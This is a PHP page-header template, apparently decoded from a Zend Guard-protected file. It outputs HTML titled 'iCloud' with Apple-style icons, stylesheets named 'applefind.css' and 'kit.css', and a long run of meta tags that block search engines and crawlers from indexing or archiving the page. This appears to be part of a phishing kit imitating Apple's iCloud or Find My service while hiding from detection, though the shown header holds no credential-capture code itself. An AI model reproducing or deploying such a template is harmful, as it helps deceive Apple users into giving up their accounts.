<?php
/**
 * @ PHP 5.6
 * @ Decoder version : 1.0.0.4
 * @ Release on : 24.03.2018
 * @ Website    : http://EasyToYou.eu
 *
 * @ Zend guard decoder PHP 5.6
 **/

echo '<!DOCTYPE html>' . "\n" . '<html lang="en">' . "\n" . '<head>' . "\n\t" . '<meta charset="UTF-8">' . "\n\t" . '<meta name="robots" content="noindex, nofollow, noarchive" />' . "\n\t" . '<meta name="googlebot" content="noindex, nofollow, noarchive">' . "\n\t" . '<meta name="googlebot" content="nosnippet" />' . "\n\t" . '<meta name="robots" content="noodp" />' . "\n\t" . '<meta name="slurp" content="noydir">' . "\n\t" . '<meta name="robots" content="noimageindex,nomediaindex" />' . "\n\t" . '<meta name="robots" content="unavailable_after: 21-Jul-2037 14:30:00 CET" />' . "\n\t" . '<meta http-equiv="X-UA-Compatible" content="IE=edge">' . "\n\t" . '<meta content="width=device-width, initial-scale=1" name="viewport"/>' . "\n" . '    <link rel="apple-touch-icon" sizes="57x57" href="/assets/favicon/apple-icon-57x57.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="60x60" href="/assets/favicon/apple-icon-60x60.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="72x72" href="/assets/favicon/apple-icon-72x72.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="76x76" href="/assets/favicon/apple-icon-76x76.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="114x114" href="/assets/favicon/apple-icon-114x114.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="120x120" href="/assets/favicon/apple-icon-120x120.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="144x144" href="/assets/favicon/apple-icon-144x144.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="152x152" href="/assets/favicon/apple-icon-152x152.png">' . "\n" . '    <link rel="apple-touch-icon" sizes="180x180" href="/assets/favicon/apple-icon-180x180.png">' . "\n" . '    <link rel="icon" type="image/png" sizes="192x192"  href="/assets/favicon/android-icon-192x192.png">' . "\n" . '    <link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon/favicon-32x32.png">' . "\n" . '    <link rel="icon" type="image/png" sizes="96x96" href="/assets/favicon/favicon-96x96.png">' . "\n" . '    <link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon/favicon-16x16.png">' . "\n" . '    <link rel="manifest" href="/assets/favicon/manifest.json">' . "\n" . '    <meta name="msapplication-TileColor" content="#ffffff">' . "\n" . '    <meta name="msapplication-TileImage" content="/assets/favicon/ms-icon-144x144.png">' . "\n" . '    <meta name="theme-color" content="#ffffff">' . "\n\t" . '<title>';
echo isset($title) ? $title : 'iCloud';
echo '</title>' . "\n\t" . '<link rel="stylesheet" href="/assets/layout/strap.css">' . "\n\t" . '<link rel="stylesheet" href="/assets/layout/applefind.css">' . "\n\t" . '<link rel="stylesheet" href="/assets/layout/kit.css">' . "\n\t" . '<link rel="stylesheet" href="/assets/layout/animate.css">' . "\t\n" . '</head>' . "\n" . '<body class="robots-nocontent">' . "\n\n";

?>
